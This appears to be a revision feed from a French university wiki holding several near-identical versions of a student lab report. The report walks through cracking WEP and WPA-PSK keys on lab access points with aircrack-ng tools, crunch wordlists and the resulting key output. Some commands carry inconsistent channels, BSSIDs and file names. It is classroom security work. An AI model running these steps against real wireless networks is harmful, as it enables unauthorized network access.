             KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]&lt;br /&gt;
    Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===='''Cassage de clef WPA-PSK d’un point d’accès WiFi'''====&lt;br /&gt;
&lt;br /&gt;
On repart des manipulations faites pour craquer la clé WEP (jusqu'au changement du nom de l'interface en wlan0mon).&lt;br /&gt;
&lt;br /&gt;
On utilise la commande suivante pour obtenir l'adresse MAC et le canal de la kracotte que l'on souhaite craquer :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    44:AD:D9:5F:87:0C  -22        6        0    0   9  54e. WPA2 CCMP   PSK  kracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la kracotte13 est sur le canal 9 et que son adresse MAC est 44:AD:D9:5F:87:0C.&lt;br /&gt;
&lt;br /&gt;
On va stocker environ 10000 trames passants par la kracotte dans un fichier &amp;quot;kracotte.txt&amp;quot; avec la commande suivante :&lt;br /&gt;
    airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w kracotte.txt wlan0mon&lt;br /&gt;
&lt;br /&gt;
On crée ensuite un autre fichier texte avec tous les combinaisons composées de 8 chiffres :&lt;br /&gt;
    crunch 8 8 0123456789 &amp;gt;&amp;gt; Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
Pour gagner du temps lors du craquage de la clé, on divise le nouveau fichier en plusieurs fichiers séparés grâce à la commande suivante :&lt;br /&gt;
    split -b 200m Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
On lance ensuite plusieurs terminaux et on lance le craquage sur chacuns des fichiers générés :&lt;br /&gt;
    aircrack-ng -w xaa Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xab Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xac Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xad Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xae Dico_krakotte13.txt-13.cap&lt;br /&gt;
&lt;br /&gt;
Puis on obtient le mot de passe craqué :&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.5.2&lt;br /&gt;
    [08:04:01] 66637843/102795810 keys tested (958.44 k/s)&lt;br /&gt;
    Time left: 10 hours, 29 minutes, 3 seconds                64.83%&lt;br /&gt;
                         KEY FOUND! [ 66601666 ]&lt;br /&gt;
    Master Key     : 43 33 CD 6B EA 53 29 36 F9 53 21 00 33 0A 1A 45 &lt;br /&gt;
                     18 E3 D5 1D DD 1C 37 29 B9 6B 49 32 24 80 02 E5&lt;br /&gt;
    Transient Key  : 77 A3 E9 BF CE FD D1 2B D9 62 3B 15 3C D5 2C 20 &lt;br /&gt;
                     59 59 19 3E AF 62 8F C9 1A 48 9C 1B 4B A4 89 70 &lt;br /&gt;
                     B3 4C 79 2A 0A FB C9 71 1F 10 01 BE A5 FA 96 41 &lt;br /&gt;
                     18 04 12 0E 01 91 DD EA B2 96 17 F3 69 AC 7C F5&lt;br /&gt;
    EAPOL HMAC     : DA 48 8D 5E B4 0E F9 78 63 C7 8E 01 56 40 82 10&lt;br /&gt;
&lt;br /&gt;
== '''Tests d’intrusion''' ==&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56562</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56562"/>
				<updated>2021-11-29T12:42:38Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== '''1. Tests d’intrusion''' ==&lt;br /&gt;
===='''1.1 Cassage de clef WEP d’un point d’accès WiFi'''====&lt;br /&gt;
&lt;br /&gt;
On branche tout d'abord le module USB Wi-Pi sur la machine.&lt;br /&gt;
&lt;br /&gt;
On installe ensuite le paquetage aircrack-ng :&lt;br /&gt;
    apt install aicrack-ng&lt;br /&gt;
&lt;br /&gt;
On lit les interfaces disponibles grâce à la commande airmon-ng :&lt;br /&gt;
    root@zabeth03:~# airmon-ng&lt;br /&gt;
    PHY	   Interface	        Driver		    Chipset&lt;br /&gt;
    phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.&lt;br /&gt;
    root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb&lt;br /&gt;
    PHY	Interface	Driver		Chipset&lt;br /&gt;
    phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
    Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
            (mac80211 monitor mode vif enabled on [phy2]wlan0mon&lt;br /&gt;
            (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)&lt;br /&gt;
&lt;br /&gt;
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.&lt;br /&gt;
&lt;br /&gt;
On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :&lt;br /&gt;
    root@zabeth09:~# airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.&lt;br /&gt;
&lt;br /&gt;
On récupère ensuite dans un fichier &amp;quot;lcrack&amp;quot; toutes les données concernants la cracotte13 qui transitent sur le canal 3:&lt;br /&gt;
    airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon&lt;br /&gt;
&lt;br /&gt;
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :&lt;br /&gt;
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :&lt;br /&gt;
    aircrack-ng lcrack.cap&lt;br /&gt;
&lt;br /&gt;
On obtient rapidement la clé WEP :&lt;br /&gt;
                                                                                     Aircrack-ng 1.5.2 &lt;br /&gt;
                                                                        [00:00:00] Tested 829 keys (got 263651 IVs)&lt;br /&gt;
    KB    depth   byte(vote)&lt;br /&gt;
    0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) &lt;br /&gt;
    1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) &lt;br /&gt;
    2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) &lt;br /&gt;
    3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) &lt;br /&gt;
    4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) &lt;br /&gt;
             KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]&lt;br /&gt;
    Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===='''1.2 Cassage de clef WPA-PSK d’un point d’accès WiFi'''====&lt;br /&gt;
&lt;br /&gt;
On repart des manipulations faites pour craquer la clé WEP (jusqu'au changement du nom de l'interface en wlan0mon).&lt;br /&gt;
&lt;br /&gt;
On utilise la commande suivante pour obtenir l'adresse MAC et le canal de la kracotte que l'on souhaite craquer :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    44:AD:D9:5F:87:0C  -22        6        0    0   9  54e. WPA2 CCMP   PSK  kracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la kracotte13 est sur le canal 9 et que son adresse MAC est 44:AD:D9:5F:87:0C.&lt;br /&gt;
&lt;br /&gt;
On va stocker environ 10000 trames passants par la kracotte dans un fichier &amp;quot;kracotte.txt&amp;quot; avec la commande suivante :&lt;br /&gt;
    airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w kracotte.txt wlan0mon&lt;br /&gt;
&lt;br /&gt;
On crée ensuite un autre fichier texte avec tous les combinaisons composées de 8 chiffres :&lt;br /&gt;
    crunch 8 8 0123456789 &amp;gt;&amp;gt; Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
Pour gagner du temps lors du craquage de la clé, on divise le nouveau fichier en plusieurs fichiers séparés grâce à la commande suivante :&lt;br /&gt;
    split -b 200m Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
On lance ensuite plusieurs terminaux et on lance le craquage sur chacuns des fichiers générés :&lt;br /&gt;
    aircrack-ng -w xaa Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xab Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xac Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xad Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xae Dico_krakotte13.txt-13.cap&lt;br /&gt;
&lt;br /&gt;
Puis on obtient le mot de passe craqué :&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.5.2&lt;br /&gt;
    [08:04:01] 66637843/102795810 keys tested (958.44 k/s)&lt;br /&gt;
    Time left: 10 hours, 29 minutes, 3 seconds                64.83%&lt;br /&gt;
                         KEY FOUND! [ 66601666 ]&lt;br /&gt;
    Master Key     : 43 33 CD 6B EA 53 29 36 F9 53 21 00 33 0A 1A 45 &lt;br /&gt;
                     18 E3 D5 1D DD 1C 37 29 B9 6B 49 32 24 80 02 E5&lt;br /&gt;
    Transient Key  : 77 A3 E9 BF CE FD D1 2B D9 62 3B 15 3C D5 2C 20 &lt;br /&gt;
                     59 59 19 3E AF 62 8F C9 1A 48 9C 1B 4B A4 89 70 &lt;br /&gt;
                     B3 4C 79 2A 0A FB C9 71 1F 10 01 BE A5 FA 96 41 &lt;br /&gt;
                     18 04 12 0E 01 91 DD EA B2 96 17 F3 69 AC 7C F5&lt;br /&gt;
    EAPOL HMAC     : DA 48 8D 5E B4 0E F9 78 63 C7 8E 01 56 40 82 10&lt;br /&gt;
&lt;br /&gt;
== '''1. Tests d’intrusion''' ==&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56561</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56561"/>
				<updated>2021-11-29T12:42:05Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== '''1. Tests d’intrusion''' ==&lt;br /&gt;
===='''1.1 Cassage de clef WEP d’un point d’accès WiFi'''====&lt;br /&gt;
&lt;br /&gt;
On branche tout d'abord le module USB Wi-Pi sur la machine.&lt;br /&gt;
&lt;br /&gt;
On installe ensuite le paquetage aircrack-ng :&lt;br /&gt;
    apt install aicrack-ng&lt;br /&gt;
&lt;br /&gt;
On lit les interfaces disponibles grâce à la commande airmon-ng :&lt;br /&gt;
    root@zabeth03:~# airmon-ng&lt;br /&gt;
    PHY	   Interface	        Driver		    Chipset&lt;br /&gt;
    phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.&lt;br /&gt;
    root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb&lt;br /&gt;
    PHY	Interface	Driver		Chipset&lt;br /&gt;
    phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
    Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
            (mac80211 monitor mode vif enabled on [phy2]wlan0mon&lt;br /&gt;
            (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)&lt;br /&gt;
&lt;br /&gt;
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.&lt;br /&gt;
&lt;br /&gt;
On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :&lt;br /&gt;
    root@zabeth09:~# airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.&lt;br /&gt;
&lt;br /&gt;
On récupère ensuite dans un fichier &amp;quot;lcrack&amp;quot; toutes les données concernants la cracotte13 qui transitent sur le canal 3:&lt;br /&gt;
    airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon&lt;br /&gt;
&lt;br /&gt;
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :&lt;br /&gt;
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :&lt;br /&gt;
    aircrack-ng lcrack.cap&lt;br /&gt;
&lt;br /&gt;
On obtient rapidement la clé WEP :&lt;br /&gt;
                                                                                     Aircrack-ng 1.5.2 &lt;br /&gt;
                                                                        [00:00:00] Tested 829 keys (got 263651 IVs)&lt;br /&gt;
    KB    depth   byte(vote)&lt;br /&gt;
    0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) &lt;br /&gt;
    1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) &lt;br /&gt;
    2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) &lt;br /&gt;
    3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) &lt;br /&gt;
    4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) &lt;br /&gt;
             KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]&lt;br /&gt;
    Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===='''1.2 Cassage de clef WPA-PSK d’un point d’accès WiFi'''====&lt;br /&gt;
&lt;br /&gt;
On repart des manipulations faites pour craquer la clé WEP (jusqu'au changement du nom de l'interface en wlan0mon).&lt;br /&gt;
&lt;br /&gt;
On utilise la commande suivante pour obtenir l'adresse MAC et le canal de la kracotte que l'on souhaite craquer :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    44:AD:D9:5F:87:0C  -22        6        0    0   9  54e. WPA2 CCMP   PSK  kracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la kracotte13 est sur le canal 9 et que son adresse MAC est 44:AD:D9:5F:87:0C.&lt;br /&gt;
&lt;br /&gt;
On va stocker environ 10000 trames passants par la kracotte dans un fichier &amp;quot;kracotte.txt&amp;quot; avec la commande suivante :&lt;br /&gt;
    airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w kracotte.txt wlan0mon&lt;br /&gt;
&lt;br /&gt;
On crée ensuite un autre fichier texte avec tous les combinaisons composées de 8 chiffres :&lt;br /&gt;
    crunch 8 8 0123456789 &amp;gt;&amp;gt; Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
Pour gagner du temps lors du craquage de la clé, on divise le nouveau fichier en plusieurs fichiers séparés grâce à la commande suivante :&lt;br /&gt;
    split -b 200m Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
On lance ensuite plusieurs terminaux et on lance le craquage sur chacuns des fichiers générés :&lt;br /&gt;
    aircrack-ng -w xaa Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xab Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xac Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xad Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xae Dico_krakotte13.txt-13.cap&lt;br /&gt;
&lt;br /&gt;
Puis on obtient le mot de passe craqué :&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.5.2&lt;br /&gt;
    [08:04:01] 66637843/102795810 keys tested (958.44 k/s)&lt;br /&gt;
    Time left: 10 hours, 29 minutes, 3 seconds                64.83%&lt;br /&gt;
                         KEY FOUND! [ 66601666 ]&lt;br /&gt;
    Master Key     : 43 33 CD 6B EA 53 29 36 F9 53 21 00 33 0A 1A 45 &lt;br /&gt;
                     18 E3 D5 1D DD 1C 37 29 B9 6B 49 32 24 80 02 E5&lt;br /&gt;
    Transient Key  : 77 A3 E9 BF CE FD D1 2B D9 62 3B 15 3C D5 2C 20 &lt;br /&gt;
                     59 59 19 3E AF 62 8F C9 1A 48 9C 1B 4B A4 89 70 &lt;br /&gt;
                     B3 4C 79 2A 0A FB C9 71 1F 10 01 BE A5 FA 96 41 &lt;br /&gt;
                     18 04 12 0E 01 91 DD EA B2 96 17 F3 69 AC 7C F5&lt;br /&gt;
    EAPOL HMAC     : DA 48 8D 5E B4 0E F9 78 63 C7 8E 01 56 40 82 10&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56557</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56557"/>
				<updated>2021-11-29T12:33:25Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== '''1. Tests d’intrusion''' ==&lt;br /&gt;
'''1.1 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
On branche tout d'abord le module USB Wi-Pi sur la machine.&lt;br /&gt;
&lt;br /&gt;
On installe ensuite le paquetage aircrack-ng :&lt;br /&gt;
    apt install aicrack-ng&lt;br /&gt;
&lt;br /&gt;
On lit les interfaces disponibles grâce à la commande airmon-ng :&lt;br /&gt;
    root@zabeth03:~# airmon-ng&lt;br /&gt;
    PHY	   Interface	        Driver		    Chipset&lt;br /&gt;
    phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.&lt;br /&gt;
    root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb&lt;br /&gt;
    PHY	Interface	Driver		Chipset&lt;br /&gt;
    phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
    Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
            (mac80211 monitor mode vif enabled on [phy2]wlan0mon&lt;br /&gt;
            (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)&lt;br /&gt;
&lt;br /&gt;
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.&lt;br /&gt;
&lt;br /&gt;
On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :&lt;br /&gt;
    root@zabeth09:~# airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.&lt;br /&gt;
&lt;br /&gt;
On récupère ensuite dans un fichier &amp;quot;lcrack&amp;quot; toutes les données concernants la cracotte13 qui transitent sur le canal 3:&lt;br /&gt;
    airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon&lt;br /&gt;
&lt;br /&gt;
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :&lt;br /&gt;
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :&lt;br /&gt;
    aircrack-ng lcrack.cap&lt;br /&gt;
&lt;br /&gt;
On obtient rapidement la clé WEP :&lt;br /&gt;
                                                                                     Aircrack-ng 1.5.2 &lt;br /&gt;
                                                                        [00:00:00] Tested 829 keys (got 263651 IVs)&lt;br /&gt;
    KB    depth   byte(vote)&lt;br /&gt;
    0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) &lt;br /&gt;
    1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) &lt;br /&gt;
    2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) &lt;br /&gt;
    3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) &lt;br /&gt;
    4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) &lt;br /&gt;
             KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]&lt;br /&gt;
    Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
'''1.2 Cassage de clef WPA-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
On repart des manipulations faites pour craquer la clé WEP (jusqu'au changement du nom de l'interface en wlan0mon).&lt;br /&gt;
&lt;br /&gt;
On utilise la commande suivante pour obtenir l'adresse MAC et le canal de la kracotte que l'on souhaite craquer :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    44:AD:D9:5F:87:0C  -22        6        0    0   9  54e. WPA2 CCMP   PSK  kracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la kracotte13 est sur le canal 9 et que son adresse MAC est 44:AD:D9:5F:87:0C.&lt;br /&gt;
&lt;br /&gt;
On va stocker environ 10000 trames passants par la kracotte dans un fichier &amp;quot;kracotte.txt&amp;quot; avec la commande suivante :&lt;br /&gt;
    airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w kracotte.txt wlan0mon&lt;br /&gt;
&lt;br /&gt;
On crée ensuite un autre fichier texte avec tous les combinaisons composées de 8 chiffres :&lt;br /&gt;
    crunch 8 8 0123456789 &amp;gt;&amp;gt; Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
Pour gagner du temps lors du craquage de la clé, on divise le nouveau fichier en plusieurs fichiers séparés grâce à la commande suivante :&lt;br /&gt;
    split -b 200m Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
On lance ensuite plusieurs terminaux et on lance le craquage sur chacuns des fichiers générés :&lt;br /&gt;
    aircrack-ng -w xaa Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xab Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xac Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xad Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xae Dico_krakotte13.txt-13.cap&lt;br /&gt;
&lt;br /&gt;
Puis on obtient le mot de passe craqué :&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.5.2&lt;br /&gt;
    [08:04:01] 66637843/102795810 keys tested (958.44 k/s)&lt;br /&gt;
    Time left: 10 hours, 29 minutes, 3 seconds                64.83%&lt;br /&gt;
                         KEY FOUND! [ 66601666 ]&lt;br /&gt;
    Master Key     : 43 33 CD 6B EA 53 29 36 F9 53 21 00 33 0A 1A 45 &lt;br /&gt;
                     18 E3 D5 1D DD 1C 37 29 B9 6B 49 32 24 80 02 E5&lt;br /&gt;
    Transient Key  : 77 A3 E9 BF CE FD D1 2B D9 62 3B 15 3C D5 2C 20 &lt;br /&gt;
                     59 59 19 3E AF 62 8F C9 1A 48 9C 1B 4B A4 89 70 &lt;br /&gt;
                     B3 4C 79 2A 0A FB C9 71 1F 10 01 BE A5 FA 96 41 &lt;br /&gt;
                     18 04 12 0E 01 91 DD EA B2 96 17 F3 69 AC 7C F5&lt;br /&gt;
    EAPOL HMAC     : DA 48 8D 5E B4 0E F9 78 63 C7 8E 01 56 40 82 10&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56556</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56556"/>
				<updated>2021-11-29T12:32:56Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== '''1. Tests d’intrusion''' ==&lt;br /&gt;
'''1.1 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
On branche tout d'abord le module USB Wi-Pi sur la machine.&lt;br /&gt;
&lt;br /&gt;
On installe ensuite le paquetage aircrack-ng :&lt;br /&gt;
    apt install aicrack-ng&lt;br /&gt;
&lt;br /&gt;
On lit les interfaces disponibles grâce à la commande airmon-ng :&lt;br /&gt;
    root@zabeth03:~# airmon-ng&lt;br /&gt;
    PHY	   Interface	        Driver		    Chipset&lt;br /&gt;
    phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.&lt;br /&gt;
    root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb&lt;br /&gt;
    PHY	Interface	Driver		Chipset&lt;br /&gt;
    phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
    Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
            (mac80211 monitor mode vif enabled on [phy2]wlan0mon&lt;br /&gt;
            (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)&lt;br /&gt;
&lt;br /&gt;
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.&lt;br /&gt;
&lt;br /&gt;
